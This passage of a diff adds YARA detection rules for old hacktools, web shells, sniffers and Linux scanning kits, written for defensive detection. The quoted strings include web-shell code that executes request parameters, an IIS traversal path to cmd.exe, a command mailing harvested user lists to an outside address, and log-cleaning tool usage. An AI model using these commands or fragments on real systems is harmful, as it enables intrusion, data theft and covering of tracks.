+		$s20 = "Password Sniffering Is Not Running" fullword ascii
+	condition:
+		4 of them
+}
+
+rule sig_238_cmd_2 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file cmd.jsp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "be4073188879dacc6665b6532b03db9f87cfc2bb"
+	strings:
+		$s0 = "Process child = Runtime.getRuntime().exec(" ascii
+		$s1 = "InputStream in = child.getInputStream();" fullword ascii
+		$s2 = "String cmd = request.getParameter(\"" ascii
+		$s3 = "while ((c = in.read()) != -1) {" fullword ascii
+		$s4 = "<%@ page import=\"java.io.*\" %>" fullword ascii
+	condition:
+		all of them
+}
+
+rule RangeScan {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file RangeScan.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "bace2c65ea67ac4725cb24aa9aee7c2bec6465d7"
+	strings:
+		$s0 = "RangeScan.EXE" fullword wide
+		$s4 = "<br><p align=\"center\"><b>RangeScan " fullword ascii
+		$s9 = "Produced by isn0" fullword ascii
+		$s10 = "RangeScan" fullword wide
+		$s20 = "%d-%d-%d %d:%d:%d" fullword ascii
+	condition:
+		3 of them
+}
+
+rule XYZCmd_zip_Folder_Readme {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Readme.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "967cb87090acd000d22e337b8ce4d9bdb7c17f70"
+	strings:
+		$s3 = "3.xyzcmd \\\\RemoteIP /user:Administrator /pwd:1234 /nowait trojan.exe" fullword ascii
+		$s20 = "XYZCmd V1.0" fullword ascii
+	condition:
+		all of them
+}
+
+rule ByPassFireWall_zip_Folder_Inject {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Inject.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "34f564301da528ce2b3e5907fd4b1acb7cb70728"
+	strings:
+		$s6 = "Fail To Inject" fullword ascii
+		$s7 = "BtGRemote Pro; V1.5 B/{" fullword ascii
+		$s11 = " Successfully" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_sqlcmd {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file sqlcmd.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 40
+		hash = "b6e356ce6ca5b3c932fa6028d206b1085a2e1a9a"
+	strings:
+		$s0 = "Permission denial to EXEC command.:(" fullword ascii
+		$s3 = "by Eyas<cooleyas@21cn.com>" fullword ascii
+		$s4 = "Connect to %s MSSQL server success.Enjoy the shell.^_^" fullword ascii
+		$s5 = "Usage: %s <host> <uid> <pwd>" fullword ascii
+		$s6 = "SqlCmd2.exe Inside Edition." fullword ascii
+		$s7 = "Http://www.patching.net  2000/12/14" fullword ascii
+		$s11 = "Example: %s 192.168.0.1 sa \"\"" fullword ascii
+	condition:
+		4 of them
+}
+
+rule ASPack_ASPACK {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ASPACK.EXE"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "c589e6fd48cfca99d6335e720f516e163f6f3f42"
+	strings:
+		$s0 = "ASPACK.EXE" fullword wide
+		$s5 = "CLOSEDFOLDER" fullword wide
+		$s10 = "ASPack compressor" fullword wide
+	condition:
+		all of them
+}
+
+rule sig_238_2323 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file 2323.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "21812186a9e92ee7ddc6e91e4ec42991f0143763"
+	strings:
+		$s0 = "port - Port to listen on, defaults to 2323" fullword ascii
+		$s1 = "Usage: srvcmd.exe [/h] [port]" fullword ascii
+		$s3 = "Failed to execute shell" fullword ascii
+		$s5 = "/h   - Hide Window" fullword ascii
+		$s7 = "Accepted connection from client at %s" fullword ascii
+		$s9 = "Error %d: %s" fullword ascii
+	condition:
+		all of them
+}
+
+rule Jc_ALL_WinEggDropShell_rar_Folder_Install_2 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Install.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "95866e917f699ee74d4735300568640ea1a05afd"
+	strings:
+		$s1 = "http://go.163.com/sdemo" fullword wide
+		$s2 = "Player.tmp" fullword ascii
+		$s3 = "Player.EXE" fullword wide
+		$s4 = "mailto:sdemo@263.net" fullword ascii
+		$s5 = "S-Player.exe" fullword ascii
+		$s9 = "http://www.BaiXue.net (" fullword wide
+	condition:
+		all of them
+}
+
+rule sig_238_TFTPD32 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file TFTPD32.EXE"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "5c5f8c1a2fa8c26f015e37db7505f7c9e0431fe8"
+	strings:
+		$s0 = " http://arm.533.net" fullword ascii
+		$s1 = "Tftpd32.hlp" fullword ascii
+		$s2 = "Timeouts and Ports should be numerical and can not be 0" fullword ascii
+		$s3 = "TFTPD32 -- " fullword wide
+		$s4 = "%d -- %s" fullword ascii
+		$s5 = "TIMEOUT while waiting for Ack block %d. file <%s>" fullword ascii
+		$s12 = "TftpPort" fullword ascii
+		$s13 = "Ttftpd32BackGround" fullword ascii
+		$s17 = "SOFTWARE\\TFTPD32" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_iecv {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file iecv.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "6e6e75350a33f799039e7a024722cde463328b6d"
+	strings:
+		$s1 = "Edit The Content Of Cookie " fullword wide
+		$s3 = "Accessories\\wordpad.exe" fullword ascii
+		$s4 = "gorillanation.com" fullword ascii
+		$s5 = "Before editing the content of a cookie, you should close all windows of Internet" ascii
+		$s12 = "http://nirsoft.cjb.net" fullword ascii
+	condition:
+		all of them
+}
+
+rule Antiy_Ports_1_21 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Antiy Ports 1.21.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "ebf4bcc7b6b1c42df6048d198cbe7e11cb4ae3f0"
+	strings:
+		$s0 = "AntiyPorts.EXE" fullword wide
+		$s7 = "AntiyPorts MFC Application" fullword wide
+		$s20 = " @Stego:" fullword ascii
+	condition:
+		all of them
+}
+
+rule perlcmd_zip_Folder_cmd {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file cmd.cgi"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "21b5dc36e72be5aca5969e221abfbbdd54053dd8"
+	strings:
+		$s0 = "syswrite(STDOUT, \"Content-type: text/html\\r\\n\\r\\n\", 27);" fullword ascii
+		$s1 = "s/%20/ /ig;" fullword ascii
+		$s2 = "syswrite(STDOUT, \"\\r\\n</PRE></HTML>\\r\\n\", 17);" fullword ascii
+		$s4 = "open(STDERR, \">&STDOUT\") || die \"Can't redirect STDERR\";" fullword ascii
+		$s5 = "$_ = $ENV{QUERY_STRING};" fullword ascii
+		$s6 = "$execthis = $_;" fullword ascii
+		$s7 = "system($execthis);" fullword ascii
+		$s12 = "s/%2f/\\//ig;" fullword ascii
+	condition:
+		6 of them
+}
+
+rule aspbackdoor_asp3 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file asp3.txt"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "e5588665ca6d52259f7d9d0f13de6640c4e6439c"
+	strings:
+		$s0 = "<form action=\"changepwd.asp\" method=\"post\"> " fullword ascii
+		$s1 = "  Set oUser = GetObject(\"WinNT://ComputerName/\" & UserName) " fullword ascii
+		$s2 = "    value=\"<%=Request.ServerVariables(\"LOGIN_USER\")%>\"> " fullword ascii
+		$s14 = " Windows NT " fullword ascii
+		$s16 = " WIndows 2000 " fullword ascii
+		$s18 = "OldPwd = Request.Form(\"OldPwd\") " fullword ascii
+		$s19 = "NewPwd2 = Request.Form(\"NewPwd2\") " fullword ascii
+		$s20 = "NewPwd1 = Request.Form(\"NewPwd1\") " fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_FPipe {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file FPipe.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "41d57d356098ff55fe0e1f0bcaa9317df5a2a45c"
+	strings:
+		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
+		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
+		$s2 = "source port for that outbound connection being set to 53 also." fullword ascii
+		$s3 = " -s    - outbound source port number" fullword ascii
+		$s5 = "http://www.foundstone.com" fullword ascii
+		$s20 = "Attempting to connect to %s port %d" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_concon {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file concon.com"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "816b69eae66ba2dfe08a37fff077e79d02b95cc1"
+	strings:
+		$s0 = "Usage: concon \\\\ip\\sharename\\con\\con" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspbackdoor_regdll {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file regdll.asp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "5c5e16a00bcb1437bfe519b707e0f5c5f63a488d"
+	strings:
+		$s1 = "exitcode = oShell.Run(\"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, " ascii
+		$s3 = "oShell.Run \"c:\\WINNT\\system32\\regsvr32.exe /u/s \" & strFile, 0, False" fullword ascii
+		$s4 = "EchoB(\"regsvr32.exe exitcode = \" & exitcode)" fullword ascii
+		$s5 = "Public Property Get oFS()" fullword ascii
+	condition:
+		all of them
+}
+
+rule CleanIISLog {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file CleanIISLog.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "827cd898bfe8aa7e9aaefbe949d26298f9e24094"
+	strings:
+		$s1 = "CleanIP - Specify IP Address Which You Want Clear." fullword ascii
+		$s2 = "LogFile - Specify Log File Which You Want Process." fullword ascii
+		$s8 = "CleanIISLog Ver" fullword ascii
+		$s9 = "msftpsvc" fullword ascii
+		$s10 = "Fatal Error: MFC initialization failed" fullword ascii
+		$s11 = "Specified \"ALL\" Will Process All Log Files." fullword ascii
+		$s12 = "Specified \".\" Will Clean All IP Record." fullword ascii
+		$s16 = "Service %s Stopped." fullword ascii
+		$s20 = "Process Log File %s..." fullword ascii
+	condition:
+		5 of them
+}
+
+rule sqlcheck {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file sqlcheck.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "5a5778ac200078b627db84fdc35bf5bcee232dc7"
+	strings:
+		$s0 = "Power by eyas<cooleyas@21cn.com>" fullword ascii
+		$s3 = "\\ipc$ \"\" /user:\"\"" fullword ascii
+		$s4 = "SQLCheck can only scan a class B network. Try again." fullword ascii
+		$s14 = "Example: SQLCheck 192.168.0.1 192.168.0.254" fullword ascii
+		$s20 = "Usage: SQLCheck <StartIP> <EndIP>" fullword ascii
+	condition:
+		3 of them
+}
+
+rule sig_238_RunAsEx {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file RunAsEx.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "a22fa4e38d4bf82041d67b4ac5a6c655b2e98d35"
+	strings:
+		$s0 = "RunAsEx By Assassin 2000. All Rights Reserved. http://www.netXeyes.com" fullword ascii
+		$s8 = "cmd.bat" fullword ascii
+		$s9 = "Note: This Program Can'nt Run With Local Machine." fullword ascii
+		$s11 = "%s Execute Succussifully." fullword ascii
+		$s12 = "winsta0" fullword ascii
+		$s15 = "Usage: RunAsEx <UserName> <Password> <Execute File> [\"Execute Option\"]" fullword ascii
+	condition:
+		4 of them
+}
+
+rule sig_238_nbtdump {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file nbtdump.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "cfe82aad5fc4d79cf3f551b9b12eaf9889ebafd8"
+	strings:
+		$s0 = "Creation of results file - \"%s\" failed." fullword ascii
+		$s1 = "c:\\>nbtdump remote-machine" fullword ascii
+		$s7 = "Cerberus NBTDUMP" fullword ascii
+		$s11 = "<CENTER><H1>Cerberus Internet Scanner</H1>" fullword ascii
+		$s18 = "<P><H3>Account Information</H3><PRE>" fullword wide
+		$s19 = "%s's password is %s</H3>" fullword wide
+		$s20 = "%s's password is blank</H3>" fullword wide
+	condition:
+		5 of them
+}
+
+rule sig_238_Glass2k {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file Glass2k.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "b05455a1ecc6bc7fc8ddef312a670f2013704f1a"
+	strings:
+		$s0 = "Portions Copyright (c) 1997-1999 Lee Hasiuk" fullword ascii
+		$s1 = "C:\\Program Files\\Microsoft Visual Studio\\VB98" fullword ascii
+		$s3 = "WINNT\\System32\\stdole2.tlb" fullword ascii
+		$s4 = "Glass2k.exe" fullword wide
+		$s7 = "NeoLite Executable File Compressor" fullword ascii
+	condition:
+		all of them
+}
+
+rule SplitJoin_V1_3_3_rar_Folder_3 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file splitjoin.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "21409117b536664a913dcd159d6f4d8758f43435"
+	strings:
+		$s2 = "ie686@sohu.com" fullword ascii
+		$s3 = "splitjoin.exe" fullword ascii
+		$s7 = "SplitJoin" fullword ascii
+	condition:
+		all of them
+}
+
+rule aspbackdoor_EDIT {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file EDIT.ASP"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "12196cf62931cde7b6cb979c07bb5cc6a7535cbb"
+	strings:
+		$s1 = "<meta HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html;charset=gb_2312-80\">" fullword ascii
+		$s2 = "Set thisfile = fs.GetFile(whichfile)" fullword ascii
+		$s3 = "response.write \"<a href='index.asp'>" fullword ascii
+		$s5 = "if Request.Cookies(\"password\")=\"juchen\" then " fullword ascii
+		$s6 = "Set thisfile = fs.OpenTextFile(whichfile, 1, False)" fullword ascii
+		$s7 = "color: rgb(255,0,0); text-decoration: underline }" fullword ascii
+		$s13 = "if Request(\"creat\")<>\"yes\" then" fullword ascii
+	condition:
+		5 of them
+}
+
+rule aspbackdoor_entice {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file entice.asp"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "e273a1b9ef4a00ae4a5d435c3c9c99ee887cb183"
+	strings:
+		$s0 = "<Form Name=\"FormPst\" Method=\"Post\" Action=\"entice.asp\">" fullword ascii
+		$s2 = "if left(trim(request(\"sqllanguage\")),6)=\"select\" then" fullword ascii
+		$s4 = "conndb.Execute(sqllanguage)" fullword ascii
+		$s5 = "<!--#include file=sqlconn.asp-->" fullword ascii
+		$s6 = "rstsql=\"select * from \"&rstable(\"table_name\")" fullword ascii
+	condition:
+		all of them
+}
+
+rule FPipe2_0 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file FPipe2.0.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "891609db7a6787575641154e7aab7757e74d837b"
+	strings:
+		$s0 = "made to port 80 of the remote machine at 192.168.1.101 with the" fullword ascii
+		$s1 = "Unable to resolve hostname \"%s\"" fullword ascii
+		$s2 = " -s    - outbound connection source port number" fullword ascii
+		$s3 = "source port for that outbound connection being set to 53 also." fullword ascii
+		$s4 = "http://www.foundstone.com" fullword ascii
+		$s19 = "FPipe" fullword ascii
+	condition:
+		all of them
+}
+
+rule InstGina {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file InstGina.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "5317fbc39508708534246ef4241e78da41a4f31c"
+	strings:
+		$s0 = "To Open Registry" fullword ascii
+		$s4 = "I love Candy very much!!" ascii
+		$s5 = "GinaDLL" fullword ascii
+	condition:
+		all of them
+}
+
+rule ArtTray_zip_Folder_ArtTray {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ArtTray.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "ee1edc8c4458c71573b5f555d32043cbc600a120"
+	strings:
+		$s0 = "http://www.brigsoft.com" fullword wide
+		$s2 = "ArtTrayHookDll.dll" fullword ascii
+		$s3 = "ArtTray Version 1.0 " fullword wide
+		$s16 = "TRM_HOOKCALLBACK" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_findoor {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file findoor.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "cdb1ececceade0ecdd4479ecf55b0cc1cf11cdce"
+	strings:
+		$s0 = "(non-Win32 .EXE or error in .EXE image)." fullword ascii
+		$s8 = "PASS hacker@hacker.com" fullword ascii
+		$s9 = "/scripts/..%c1%1c../winnt/system32/cmd.exe" fullword ascii
+		$s10 = "MAIL FROM:hacker@hacker.com" fullword ascii
+		$s11 = "http://isno.yeah.net" fullword ascii
+	condition:
+		4 of them
+}
+
+rule aspbackdoor_ipclear {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file ipclear.vbs"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "9f8fdfde4b729516330eaeb9141fb2a7ff7d0098"
+	strings:
+		$s0 = "Set ServiceObj = GetObject(\"WinNT://\" & objNet.ComputerName & \"/w3svc\")" fullword ascii
+		$s1 = "wscript.Echo \"USAGE:KillLog.vbs LogFileName YourIP.\"" fullword ascii
+		$s2 = "Set txtStreamOut = fso.OpenTextFile(destfile, ForWriting, True)" fullword ascii
+		$s3 = "Set objNet = WScript.CreateObject( \"WScript.Network\" )" fullword ascii
+		$s4 = "Set fso = CreateObject(\"Scripting.FileSystemObject\")" fullword ascii
+	condition:
+		all of them
+}
+
+rule WinEggDropShellFinal_zip_Folder_InjectT {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file InjectT.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "516e80e4a25660954de8c12313e2d7642bdb79dd"
+	strings:
+		$s0 = "Packed by exe32pack" ascii
+		$s1 = "2TInject.Dll" fullword ascii
+		$s2 = "Windows Services" fullword ascii
+		$s3 = "Findrst6" fullword ascii
+		$s4 = "Press Any Key To Continue......" fullword ascii
+	condition:
+		all of them
+}
+
+rule sig_238_rshsvc {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file rshsvc.bat"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "fb15c31254a21412aecff6a6c4c19304eb5e7d75"
+	strings:
+		$s0 = "if not exist %1\\rshsetup.exe goto ERROR2" fullword ascii
+		$s1 = "ECHO rshsetup.exe is not found in the %1 directory" fullword ascii
+		$s9 = "REM %1 directory must have rshsetup.exe,rshsvc.exe and rshsvc.dll" fullword ascii
+		$s10 = "copy %1\\rshsvc.exe" fullword ascii
+		$s12 = "ECHO Use \"net start rshsvc\" to start the service." fullword ascii
+		$s13 = "rshsetup %SystemRoot%\\system32\\rshsvc.exe %SystemRoot%\\system32\\rshsvc.dll" fullword ascii
+		$s18 = "pushd %SystemRoot%\\system32" fullword ascii
+	condition:
+		all of them
+}
+
+rule gina_zip_Folder_gina {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file gina.dll"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "e0429e1b59989cbab6646ba905ac312710f5ed30"
+	strings:
+		$s0 = "NEWGINA.dll" fullword ascii
+		$s1 = "LOADER ERROR" fullword ascii
+		$s3 = "WlxActivateUserShell" fullword ascii
+		$s6 = "WlxWkstaLockedSAS" fullword ascii
+		$s13 = "WlxIsLockOk" fullword ascii
+		$s14 = "The procedure entry point %s could not be located in the dynamic link library %s" fullword ascii
+		$s16 = "WlxShutdown" fullword ascii
+		$s17 = "The ordinal %u could not be located in the dynamic link library %s" fullword ascii
+	condition:
+		all of them
+}
+
+rule superscan3_0 {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file superscan3.0.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "a9a02a14ea4e78af30b8b4a7e1c6ed500a36bc4d"
+	strings:
+		$s0 = "\\scanner.ini" fullword ascii
+		$s1 = "\\scanner.exe" fullword ascii
+		$s2 = "\\scanner.lst" fullword ascii
+		$s4 = "\\hensss.lst" fullword ascii
+		$s5 = "STUB32.EXE" fullword wide
+		$s6 = "STUB.EXE" fullword wide
+		$s8 = "\\ws2check.exe" fullword ascii
+		$s9 = "\\trojans.lst" fullword ascii
+		$s10 = "1996 InstallShield Software Corporation" fullword wide
+	condition:
+		all of them
+}
+
+rule sig_238_xsniff {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file xsniff.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "d61d7329ac74f66245a92c4505a327c85875c577"
+	strings:
+		$s2 = "xsiff.exe -pass -hide -log pass.log" fullword ascii
+		$s3 = "%s - simple sniffer for win2000" fullword ascii
+		$s4 = "xsiff.exe -tcp -udp -asc -addr 192.168.1.1" fullword ascii
+		$s5 = "HOST: %s USER: %s, PASS: %s" fullword ascii
+		$s7 = "http://www.xfocus.org" fullword ascii
+		$s9 = "  -pass        : Filter username/password" fullword ascii
+		$s18 = "  -udp         : Output udp packets" fullword ascii
+		$s19 = "Code by glacier <glacier@xfocus.org>" fullword ascii
+		$s20 = "  -tcp         : Output tcp packets" fullword ascii
+	condition:
+		6 of them
+}
+
+rule sig_238_fscan {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - file fscan.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		hash = "d5646e86b5257f9c83ea23eca3d86de336224e55"
+	strings:
+		$s0 = "FScan v1.12 - Command line port scanner." fullword ascii
+		$s2 = " -n    - no port scanning - only pinging (unless you use -q)" fullword ascii
+		$s5 = "Example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200" fullword ascii
+		$s6 = " -z    - maximum simultaneous threads to use for scanning" fullword ascii
+		$s12 = "Failed to open the IP list file \"%s\"" fullword ascii
+		$s13 = "http://www.foundstone.com" fullword ascii
+		$s16 = " -p    - TCP port(s) to scan (a comma separated list of ports/ranges) " fullword ascii
+		$s18 = "Bind port number out of range. Using system default." fullword ascii
+		$s19 = "fscan.exe" fullword wide
+	condition:
+		4 of them
+}
+
+rule _iissample_nesscan_twwwscan {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - from files iissample.exe, nesscan.exe, twwwscan.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		super_rule = 1
+		hash0 = "7f20962bbc6890bf48ee81de85d7d76a8464b862"
+		hash1 = "c0b1a2196e82eea4ca8b8c25c57ec88e4478c25b"
+		hash2 = "548f0d71ef6ffcc00c0b44367ec4b3bb0671d92f"
+	strings:
+		$s0 = "Connecting HTTP Port - Result: " fullword
+		$s1 = "No space for command line argument vector" fullword
+		$s3 = "Microsoft(July/1999~) http://www.microsoft.com/technet/security/current.asp" fullword
+		$s5 = "No space for copy of command line" fullword
+		$s7 = "-  Windows NT,2000 Patch Method  - " fullword
+		$s8 = "scanf : floating point formats not linked" fullword
+		$s12 = "hrdir_b.c: LoadLibrary != mmdll borlndmm failed" fullword
+		$s13 = "!\"what?\"" fullword
+		$s14 = "%s Port %d Closed" fullword
+		$s16 = "printf : floating point formats not linked" fullword
+		$s17 = "xxtype.cpp" fullword
+	condition:
+		all of them
+}
+
+rule _FsHttp_FsPop_FsSniffer {
+	meta:
+		description = "Disclosed hacktool set (old stuff) - from files FsHttp.exe, FsPop.exe, FsSniffer.exe"
+		author = "Florian Roth"
+		date = "23.11.14"
+		score = 60
+		super_rule = 1
+		hash0 = "9d4e7611a328eb430a8bb6dc7832440713926f5f"
+		hash1 = "ae23522a3529d3313dd883727c341331a1fb1ab9"
+		hash2 = "7ffc496cd4a1017485dfb571329523a52c9032d8"
+	strings:
+		$s0 = "-ERR Invalid Command, Type [Help] For Command List" fullword
+		$s1 = "-ERR Get SMS Users ID Failed" fullword
+		$s2 = "Control Time Out 90 Secs, Connection Closed" fullword
+		$s3 = "-ERR Post SMS Failed" fullword
+		$s4 = "Current.hlt" fullword
+		$s6 = "Histroy.hlt" fullword
+		$s7 = "-ERR Send SMS Failed" fullword
+		$s12 = "-ERR Change Password <New Password>" fullword
+		$s17 = "+OK Send SMS Succussifully" fullword
+		$s18 = "+OK Set New Password: [%s]" fullword
+		$s19 = "CHANGE PASSWORD" fullword
+	condition:
+		all of them
+}
+
+rule Ammyy_Admin_AA_v3 {
+	meta:
+		description = "Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe"
+		author = "Florian Roth"
+		reference = "http://goo.gl/gkAg2E"
+		date = "2014/12/22"
+		score = 55
+		hash1 = "b130611c92788337c4f6bb9e9454ff06eb409166"
+		hash2 = "07539abb2623fe24b9a05e240f675fa2d15268cb"
+	strings:
+		$x1 = "S:\\Ammyy\\sources\\target\\TrService.cpp" fullword ascii
+		$x2 = "S:\\Ammyy\\sources\\target\\TrDesktopCopyRect.cpp" fullword ascii
+		$x3 = "Global\\Ammyy.Target.IncomePort" fullword ascii
+		$x4 = "S:\\Ammyy\\sources\\target\\TrFmFileSys.cpp" fullword ascii
+		$x5 = "Please enter password for accessing remote computer" fullword ascii
+
+		$s1 = "CreateProcess1()#3 %d error=%d" fullword ascii
+		$s2 = "CHttpClient::SendRequest2(%s, %s, %d) error: invalid host name." fullword ascii
+		$s3 = "ERROR: CreateProcessAsUser() error=%d, session=%d" fullword ascii
+		$s4 = "ERROR: FindProcessByName('explorer.exe')" fullword ascii
+	condition:
+		2 of ($x*) or all of ($s*)
+}
+
+/* Other dumper and custom hack tools */
+
+rule LinuxHacktool_eyes_screen {
+	meta:
+		description = "Linux hack tools - file screen"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "a240a0118739e72ff89cefa2540bf0d7da8f8a6c"
+	strings:
+		$s0 = "or: %s -r [host.tty]" fullword ascii
+		$s1 = "%s: process: character, ^x, or (octal) \\032 expected." fullword ascii
+		$s2 = "Type \"screen [-d] -r [pid.]tty.host\" to resume one of them." fullword ascii
+		$s6 = "%s: at [identifier][%%|*|#] command [args]" fullword ascii
+		$s8 = "Slurped only %d characters (of %d) into buffer - try again" fullword ascii
+		$s11 = "command from %s: %s %s" fullword ascii
+		$s16 = "[ Passwords don't match - your armor crumbles away ]" fullword ascii
+		$s19 = "[ Passwords don't match - checking turned off ]" fullword ascii
+	condition:
+		all of them
+}
+
+rule LinuxHacktool_eyes_scanssh {
+	meta:
+		description = "Linux hack tools - file scanssh"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "467398a6994e2c1a66a3d39859cde41f090623ad"
+	strings:
+		$s0 = "Connection closed by remote host" fullword ascii
+		$s1 = "Writing packet : error on socket (or connection closed): %s" fullword ascii
+		$s2 = "Remote connection closed by signal SIG%s %s" fullword ascii
+		$s4 = "Reading private key %s failed (bad passphrase ?)" fullword ascii
+		$s5 = "Server closed connection" fullword ascii
+		$s6 = "%s: line %d: list delimiter not followed by keyword" fullword ascii
+		$s8 = "checking for version `%s' in file %s required by file %s" fullword ascii
+		$s9 = "Remote host closed connection" fullword ascii
+		$s10 = "%s: line %d: bad command `%s'" fullword ascii
+		$s13 = "verifying that server is a known host : file %s not found" fullword ascii
+		$s14 = "%s: line %d: expected service, found `%s'" fullword ascii
+		$s15 = "%s: line %d: list delimiter not followed by domain" fullword ascii
+		$s17 = "Public key from server (%s) doesn't match user preference (%s)" fullword ascii
+	condition:
+		all of them
+}
+
+rule LinuxHacktool_eyes_pscan2 {
+	meta:
+		description = "Linux hack tools - file pscan2"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "56b476cba702a4423a2d805a412cae8ef4330905"
+	strings:
+		$s0 = "# pscan completed in %u seconds. (found %d ips)" fullword ascii
+		$s1 = "Usage: %s <b-block> <port> [c-block]" fullword ascii
+		$s3 = "%s.%d.* (total: %d) (%.1f%% done)" fullword ascii
+		$s8 = "Invalid IP." fullword ascii
+		$s9 = "# scanning: " fullword ascii
+		$s10 = "Unable to allocate socket." fullword ascii
+	condition:
+		2 of them
+}
+
+rule LinuxHacktool_eyes_a {
+	meta:
+		description = "Linux hack tools - file a"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "458ada1e37b90569b0b36afebba5ade337ea8695"
+	strings:
+		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
+		$s1 = "mv scan.log bios.txt" fullword ascii
+		$s2 = "rm -rf bios.txt" fullword ascii
+		$s3 = "echo -e \"# by Eyes.\"" fullword ascii
+		$s4 = "././pscan2 $1 22" fullword ascii
+		$s10 = "echo \"#cautam...\"" fullword ascii
+	condition:
+		2 of them
+}
+
+rule LinuxHacktool_eyes_mass {
+	meta:
+		description = "Linux hack tools - file mass"
+		author = "Florian Roth"
+		reference = "not set"
+		date = "2015/01/19"
+		hash = "2054cb427daaca9e267b252307dad03830475f15"
+	strings:
+		$s0 = "cat trueusers.txt | mail -s \"eyes\" clubby@slucia.com" fullword ascii
